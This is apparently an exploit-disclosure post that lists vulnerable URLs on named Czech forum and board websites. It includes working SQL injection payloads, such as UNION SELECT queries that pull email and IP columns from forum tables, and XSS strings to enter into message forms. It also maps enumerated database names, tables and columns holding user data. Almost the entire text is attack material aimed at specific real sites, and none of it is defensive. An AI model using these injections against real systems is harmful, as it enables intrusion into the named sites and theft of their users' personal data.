.,,,,,,,,,,.
,;;;;;;;;;;;;;;,
,;;;;;;;;;;;)));;(((,,;;;,,_
,;;;;;;;;;;' |)))))))))))\\
;;;;;;/ )'' - /,)))((((((((((\
;;;;' \ ~|\ ))))))))))))))
/ / | ((((((((((((((
/' \ _/~ ')|()))))))))
/' `\ /> o_/)))((((((((
/ /' `~~(____ / ()))))))))))
| ---, \ \ (((((((((((
| `\ \~-_____| )))))))))
| `\ | |_.---.((((((((
\ | | )))))))))
((((((((
)))))))
((((((.cz Czech Republic
#Author: Emiliano Febbi (*emilianofebbi.1994@gmail.com*)
#Web Site Creator => ???
#Dork => ???
#CMS => Czech Republic boards and forums
#Vulnz => XSS/Blind SQLi/SQLi
#Date => 04/04/2023
*PoC*
[code]
______________________________________________________________________________________________________________#1
http://www.catia-forum.cz/forum/messages.php?action=read&message_id=-873 <= [*Blind SQLi*] |______________________________________________________
http://www.catia-forum.cz/forum/messages.php?action=new_message <= [*XSS*] :in the textarea insert *'>\>">* |
and send message to yourself ,you can see result in page:*/forum/messages.php*|
http://www.catia-forum.cz/forum/quick_search.php?searched_string= <= [*XSS*] |------------------------------------------------------------|
________________________________________________________________________________________________________|
__________________________________________________________________________
https://www.broumovske.info/forum/forum.php?page=-165 <= [*Blind SQLi*] |
https://www.broumovske.info/forum/add.php?tid=00021409 <= [*SQLi*] |________________________________________________
https://www.broumovske.info/forum/add.php?tid=00021409 union all select 1,2,3,ip,email,6,7,8,9,10,11,12 FROM forum_items-- |
___________________________________________________________________________________________________________________________|
#DB name: broumovske_info | #2
#Tables: forum_items , forum_bugs |
----------------------------------
---------------- #3
#Persistent XSS |:
-----------------------------------------------------------------------------------------------------------
http://handyscript.wz.cz/board.php <= [*XSS*] :in the form try to insert '>\>"> |
#name:vulnerable |
#email:vulnerable |
#comment:vulnerable |
-----------------------------------------------------------------------------------------------------------
#4
...............................................................................................................................................
http://www.oleje-maziva.cz/board_entry.php?id=2608&page=5%&category=all&order=name&descasc=ASC <= [*XSS*] |
...............................................................................................................................................
.............................................................................#5
http://www.globalchant.org/view-source.php?src=Lu&page=427 <= [*Blind SQLi*] |
.............................................................................
#DB Name => d9165_gcd |
......................
#Tables: |
-----------------------------------------------
vulgata |
konkordanceBible |
images |-----
forum => columns: => text , date , email , name , ID |
correct |
IndexChant2 |
IndexChant |
-----------------------------------------------------
_________________________________________________________________________________________________#6
https://kunice.countryhome.cz/topics.php?kat=1% <= [*XSS*] |
https://kunice.countryhome.cz/topics.php?kat=-1 union all select email FROM forum-- <= [*SQLi*] |
https://kunice.countryhome.cz/topics.php?kat=-1 union all select email FROM forum2-- <= [*SQLi*] |
_________________________________________________________________________________________________|
#DB Name => kunice_countryhome_cz |
-----------------------------------
#Tables: |
------------------------------------------------------------------------------------------------------------------------------------
forum => columns: => datumida , name , email , title , text , kat , datum |
forum2 => columns: => datumida , datumida_order , name , email , title , text , kat , rodic , top_rodic , datum , addr , datum_cas |
kategorie |
pocitadlo |
pristupy |
smsnotify |
smsnotify_test |
spamtext |
------------------------------------------------------------------------------------------------------------------------------------
_____________________________________________________________#7
https://www.skoda110r.cz/forum.php?page=-1 <= [*Blind SQLi*] |
-------------------------------------------------------------
https://www.omforum.cz/forum.php?t=95 <= [*Blind SQLi*] |
--------------------------------------------------------#8
............................................................#Extra
-forum:kingsofmetal.cz/main.php?LNG=eng&SRC=topic |
-login:/main.php?LNG=eng&SRC=login <= [*bugged*]|
------------------------------------------------------------
http://kingsofmetal.cz/img/image.php?id=user_ <= [*SQLi*]
---------------------------------------
#DB name => manowar_kingsofmetal_cz |
---------------------------------------
#Tables: |
--------------
albums |
ankety |
ankety_otazky |
forum |
forum_topics |
links |
members |
news |
newsletter |
pictures |
shirts_cart |
songs |
stats |
tourdates |
users |
vazba_a_s |
______________
[/code]
._________.
*/ ///______I
) . /_(_)
/__/*PoC End*